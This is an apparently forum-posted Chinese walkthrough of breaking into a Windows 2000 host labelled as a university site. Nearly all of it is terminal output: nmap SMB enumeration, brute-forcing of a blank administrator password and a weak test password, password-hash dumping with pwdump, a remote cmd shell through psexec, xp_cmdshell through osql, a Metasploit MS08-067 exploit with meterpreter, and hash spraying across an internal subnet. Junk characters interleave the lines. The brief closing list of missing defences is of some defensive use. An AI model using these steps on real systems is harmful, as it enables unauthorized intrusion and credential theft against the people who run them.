广西师范网站http://202.103.242.241/
1 S* c' d: Y( {" }6 V1 ]8 `% A* ~
root@bt:~# nmap -sS -sV 202.103.242.241
$ N- b" S. W' M9 [
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
) a4 \% u( o. y9 u) u2 `" A6 E. S( ~$ ~, ]3 w& w! F" |
Nmap scan report for bogon (202.103.242.241)
' W @" e+ F8 e' j0 o- U
Host is up (0.00048s latency).
) R. L4 a" J" D# s: I4 N0 y ]
Not shown: 993 closed ports
+ }. n- z; l$ L
PORT STATE SERVICE VERSION
( ?! R2 w5 o" t5 M& f
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
4 |' B9 Z s4 Q! J2 @* j; s' d
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open msrpc Microsoft Windows RPC
$ D% \* V0 T% |
3372/tcp open msdtc?
3389/tcp open ms-term-serv?
0 }1 P: U3 E l
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
! E& W1 k( Q- w( _% y. i! e1 V5 N; a2 E2 y! v
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
) |8 h7 C+ b5 b- B8 Z# R
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
! i4 F$ E+ e* }0 T" ?) J# A
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
6 ~( |0 P2 l) X/ h; B
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
& [. C. H: |6 b- {. m- Q5 d; F4 l/ P9 t7 Z; b
Service Info: OS: Windows
, t) ?: @, F b4 _- w* |$ D
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
# ?. l% M' _$ l" W6 x, F4 m1 r( l9 k R! R0 S. P# ?% k
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
& M' ~7 l, b, S" I6 C* b
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
2 n+ X4 z0 @' l/ e
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
- f* {+ R+ b- h5 ^$ `# b1 Q
-rw-r--r-- 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
+ M) U* f6 k" g- s" o- r/ u
-rw-r--r-- 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
8 X1 B* b& ]. k! w6 Q
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
5 ` m) V' e q4 B& {7 C/ L
-rw-r--r-- 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
( M$ c. w P7 m m; i- E7 X Q
-rw-r--r-- 1 root root 1658 2011-07-09 07:36 smb-flood.nse
8 ^$ I* h' M6 U7 [9 [0 Y9 ^
-rw-r--r-- 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
& M- f6 J @/ ~, h. e# E5 m5 ^3 Y8 y* H( M) I- V8 z' }
-rw-r--r-- 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
A Q2 ^! H8 W- z+ h
-rw-r--r-- 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
, x6 K% m2 g$ d1 h) N# i3 A! b1 p/ ^& A& ?# b
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
$ y B% l3 i4 A& D8 O' B2 _5 a8 g1 ]0 L9 q, q6 d' I
//此乃使用脚本扫描远程机器所存在的账户名
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
4 z7 ^' t+ ^/ N6 u
Host is up (0.00038s latency).
) a/ j- K, E7 O4 a
Not shown: 993 closed ports
PORT STATE SERVICE
& k7 S( P& n; J& A( D
135/tcp open msrpc
139/tcp open netbios-ssn
7 d- R3 a ~2 u @7 ?) _! A9 ~
445/tcp open microsoft-ds
9 w m k& i* R8 [: w' L; [4 u2 J2 y$ ~2 `) d/ {; F- Z7 V
1025/tcp open NFS-or-IIS
/ V; y+ e* V' v2 s3 m9 A2 z
1026/tcp open LSA-or-nterm
) Z- h% a6 ?3 s5 b/ `% B3 W' L0 K, }2 F* m
3372/tcp open msdtc
/ I; w4 s+ i4 A4 x$ L
3389/tcp open ms-term-serv
. u# N$ ~' d( Z* z" d4 F
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
2 u# s1 U3 J2 m& G0 I% \% C, ~
Host script results:
8 a4 p) Z3 u5 o- w
| smb-enum-users:
" s0 V: I! ^( w
|_ Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser //扫描结果
( U3 R6 A, T) G5 D7 V. W
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
! F$ m0 y( W( C7 b; B% F
//查看共享
2 v' b( C5 l; K% E1 z. [. Z$ g0 d. t' d
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
8 E0 O( u6 Z% t: L1 a1 i# T ]! O1 D3 O1 a; {+ w; `. M" ~. Y% ]
Host is up (0.00035s latency).
: A1 g3 ~/ Y0 c8 b# B$ \
Not shown: 993 closed ports
PORT STATE SERVICE
_5 B- }, m; | \4 p' M) v7 K0 z. r' z( \8 A
135/tcp open msrpc
7 t& ]# e7 e, k2 ?& K
139/tcp open netbios-ssn
) _' v- b5 U% Q! G+ K/ T
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
& _ N& ~9 t- a9 p9 K) N4 G& t% r1 P" O- b& _
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
7 H) C/ ~' v; g) i
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
5 R" } _5 c. }% \0 I1 U. ?. | P5 P
Host script results:
5 `) n" w4 l- l$ Y' ]
| smb-enum-shares:
/ M; v/ ^2 h3 @! L& d% h- ]; p) P( \! F: _; ]* g
| ADMIN$
9 M5 H! U4 b! h5 }' \ V( y0 F3 w+ T. m/ C- a# J+ i' W+ }
| Anonymous access: <none>
O. e0 u+ u2 c1 z! G! X+ v
| C$
9 O4 u5 T9 Q7 \; W7 r2 E
| Anonymous access: <none>
; F( [# e3 V% o
| IPC$
2 X: N8 Q3 ]0 [) x3 b0 m$ F
|_ Anonymous access: READ
+ H: }/ w9 o/ R" E; Y# z& ?6 X v. `. D/ `2 F# K
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
e8 t- w2 |/ x+ X6 O y Z, J
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
//获取用户密码
* n& I7 z t3 c' t8 ^. ?( D4 ?/ d1 `+ w& n8 R$ F/ k
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
8 u2 U" t, U. \
Nmap scan report for bogon (202.103.242.241)
+ a5 [8 }0 \6 X0 w6 m1 g/ P3 f
Host is up (0.00041s latency).
Not shown: 993 closed ports
2 |( g0 A6 a# z7 {! P0 }" H R! q. I! k1 k( a: a |/ q
PORT STATE SERVICE
( k5 \# u' h# t# u6 N+ N+ P6 S' o
135/tcp open msrpc
: y2 b* V/ T- ^8 Q7 V9 \" i& s9 V& ^! x' b y
139/tcp open netbios-ssn
! X. o$ C0 d/ ^' }5 J
445/tcp open microsoft-ds
; y8 C9 C. }+ ]/ E2 S% p0 @5 Q$ v, X9 X# m
1025/tcp open NFS-or-IIS
: }% C3 ?& ^' p8 v8 m6 E, i, U+ X) R9 D
1026/tcp open LSA-or-nterm
1 C7 w4 s0 I/ }, M# f% I- Q) G7 R" }. T) J. R3 E
3372/tcp open msdtc
: @+ L5 g L/ d3 m5 L3 r% c4 C4 x
3389/tcp open ms-term-serv
* k4 g. y1 ~% J( `, }- T+ n0 g5 G: M" ^5 f) K0 V. w
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
8 }/ H$ I; ~" u" B: L" I# [- ^% x& W3 k& b) T
Host script results:
$ F% Z5 B3 {; D" O9 k W Y
| smb-brute:
| administrator:<blank> => Login was successful
7 d1 A0 q6 w t3 ^6 \
|_ test:123456 => Login was successful
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
. P1 |, W. G3 Z" e& I2 W7 J/ c- M% J7 x+ h1 ~. V
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2 //抓hash
. c; V [% {* {# @5 h0 C# g, \
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
8 e- _/ c! V( Z. W1 }0 q
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
( V* g2 o+ e& G. `& Y/ R
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
3 z$ ]: w8 E5 G5 y
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
8 c. e- j. e) c/ U: Q( @) a1 b' [$ J9 v$ U0 e6 f7 L% z6 Z3 I- N% u
Nmap scan report for bogon (202.103.242.241)
% y& z6 g4 V0 U4 V
Host is up (0.0012s latency).
9 G- l& ^3 b0 P6 Y3 _# O0 S- t' V) j5 w$ m% ]4 j2 L7 f
PORT STATE SERVICE
135/tcp open msrpc
. ~' N1 a5 i6 C1 h* l* J7 d( c+ W7 ` g' f7 S. T" R
139/tcp open netbios-ssn
1 c, `" b9 H( J. w4 t
445/tcp open microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
' H f& r6 H6 c3 @3 y" l, i% f" Q8 e8 o& a' w3 `
Host script results:
| smb-pwdump:
5 S5 j1 ~- u$ U. M0 h* y8 e& \% J3 Z+ A3 U7 r
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
- m4 y& N" ^+ E& A8 n( H( y& T$ M# J, O$ q0 V
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
4 t& b/ a C6 }) L+ [
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
, D: o& }. k6 e% u; [; p# E- U' X# O! Y/ I; N& L/ D
|_ TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
( l4 j+ p v1 T+ ]
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
% O5 I6 {6 g) }( v* {7 F' X2 z2 _ o- U& P( O6 a! l
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
/ D: b$ w+ x* Q) @( ^- N
-p 123456 -e cmd.exe
; R5 v) r: n; l1 Y! W u6 l" Z& V6 ?) q$ N
PsExec v1.55 - Execute processes remotely
( S) ?$ F8 b. q( \9 K6 Z4 k4 X( x( s- U/ M" \) Y# D/ y7 ]
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows 2000 [Version 5.00.2195]
0 {6 ]8 B( R$ F7 ]8 [6 R* [
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>ipconfig
% {2 W8 N9 z! ^) U2 g" E
Windows 2000 IP Configuration
1 Q w5 y7 u6 T2 \" `# o9 x' T* I
Ethernet adapter 本地连接:
5 `" e! t+ [: m" H U' e8 i! v8 ^. B$ V9 ]" q+ m; ~" x
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1
! o" H* s2 ^4 m
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'" //远程登录sa执行命令
) c6 {; Z% H8 D( A
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
: X; I$ P" W# L5 ^& m q4 K( u+ e0 v2 I6 Q& u+ i: I0 g7 Y2 l$ F1 p
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
) B6 u4 _# i8 l+ |* P! v) [* Z. p3 k C5 U4 J; L
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
. M0 f7 j6 r' |+ B' W- A
PORT STATE SERVICE
+ a- I4 d+ _9 P2 b& Q2 C
135/tcp open msrpc
: ~* C3 a m% M2 N; @' M" c) L8 d2 y! V) [6 u, \
139/tcp open netbios-ssn
' H: Z3 B, }' }% ?
445/tcp open microsoft-ds
; m; a1 z/ i+ [. n; Q% }* N( f" d- m4 b6 Z/ Q J& u
1025/tcp open NFS-or-IIS
# Q c7 }% x h
1026/tcp open LSA-or-nterm
+ A: N, `2 d& `! I; E5 G7 o5 c: E8 ^9 k. g2 [- i# `1 q
3372/tcp open msdtc
, M7 E: W, o. X& N$ _5 ?& c+ e: H) M' d- O6 I5 c$ W- U6 O0 U
3389/tcp open ms-term-serv
6 h3 k- _* s9 C. f. O4 N' x3 n: w# ?# C
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
2 `$ Q* `& R8 d' }$ b \) b7 b& i
Host script results:
$ h9 Q8 y" M1 f
| smb-check-vulns:
! B8 X/ H" r& R- Y0 x
|_ MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
. m& v0 R5 T% S: G8 ?* Z% c, W, d& ?9 d
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
msf > search ms08
2 a9 O. Z# k# v5 {
msf > use exploit/windows/smb/ms08_067_netapi
3 ~" Y7 o9 N8 @( b8 `# K j0 H2 V9 h6 ^0 \
msf exploit(ms08_067_netapi) > show options
* n' k# ^0 }8 f. {) r* J3 c6 Z% l* a
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
6 p8 m$ K5 i# u
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
8 t% A: \+ Q+ ~# R) |- @
meterpreter >
" `- b* ?/ m9 j+ ]' Y+ J3 T! i" S/ E
Background session 2? [y/N] (ctrl+z)
3 P x* A% L7 b! i. ^# Y! j9 C0 } r* n4 o- B, y4 p( R
msf exploit(ms08_067_netapi) > sessions -l
1 H8 T3 v) A5 @, S# l6 z# O
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
7 c1 S5 ?/ y7 q/ p7 p6 @: i3 W: \/ ~
test
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE
- w' `; A$ g; M: j6 F% }
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
" d) e* s$ M) x: [& P. O' E
//利用用户名跟获取的hash尝试对整段内网进行登录
Nmap scan report for 192.168.1.105
5 m4 ~. t0 N( w! q6 T8 N# C0 |9 P7 J1 z1 q
Host is up (0.00088s latency).
# r& a3 ^2 Z5 f# s! _- }
Not shown: 993 closed ports
$ [9 M+ \- T/ h: c$ n6 _2 o, d, ?; \1 k" s( }5 e1 Y- X, M
PORT STATE SERVICE
, u! G' G8 o. a" _" i) ]" ^$ X6 z [/ j# S" K2 W3 L5 ? h
135/tcp open msrpc
139/tcp open netbios-ssn
# J, K$ X2 M+ l x& Z X5 }
445/tcp open microsoft-ds
5 J/ W5 x6 c$ { n
1025/tcp open NFS-or-IIS
6 f% n9 O8 x1 p' {0 e: p3 |' R; B2 G' R+ ^4 p
1026/tcp open LSA-or-nterm
8 r& `; u2 {* E" c2 s1 J" F( l* P% H* V0 B4 M6 h& ^
3372/tcp open msdtc
+ R3 P4 N2 V# Z( {" F' q7 v2 z# ~4 V. k. B
3389/tcp open ms-term-serv
" n1 U; P1 E' c8 s* A# t/ y8 M+ F2 D+ m. E- A/ c# a Y
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
3 y7 \+ Z$ E8 b9 u* n! i* ^( `
Host script results:
& ]! Y; L) H% ?$ I. M" U/ l6 h
| smb-brute:
|_ administrator:<blank> => Login was successful
9 k' L* |! V5 |, A. b" n+ Y# ]7 B, K/ @) d/ v. P+ o: M
攻击成功，一个简单的msf+nmap攻击~~ 整条链路依赖的都是基础防护缺失：Administrator 空口令、test 账户弱口令、IPC$ 匿名可读、未修补的 MS08-067，以及内网 192.168.1.105 复用了同样的空口令管理员账户。
( h8 T! I8 J) @* C" |; g2 `
|